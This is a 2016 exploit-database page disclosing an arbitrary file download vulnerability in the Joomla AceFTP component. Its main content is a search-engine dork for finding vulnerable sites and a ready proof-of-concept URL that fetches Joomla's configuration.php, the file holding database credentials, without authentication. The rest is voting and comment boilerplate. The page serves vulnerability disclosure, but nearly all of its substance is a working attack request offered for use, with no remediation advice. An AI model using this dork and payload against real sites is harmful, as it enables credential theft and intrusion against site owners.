Joomla com aceftp Arbitrary File Download Vulnerability

2016.08.17

Fallaga Team (TN)

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

Dork: inurl:/administrator/components/com_aceftp/

##############################################################
# Exploit Title: Joomla com aceftp Arbitrary File Download Vulnerability
# Exploit Author: howucan
# Dork : inurl:/administrator/components/com_aceftp/
# Software Website : http://www.joomace.net/downloads/aceftp
# Version : ALL
# Date : 2016/08/15
# Tested on : Parrot Os 3.1
# Category: webapps
#
########################
# Description :
#
# AceFTP is a smart, fast and lightweight file manager component. It
# operates from Joomla back-end so you don't have to use any FTP program
anymore.
########################
# POC :
#
#
http://localhost/path//administrator/components/com_aceftp/quixplorer/index.php?action=download&dir=&item=configuration.php&order=name&srt=yes
##############

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Joomla com aceftp Arbitrary File Download Vulnerability

Dork: inurl:/administrator/components/com_aceftp/

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.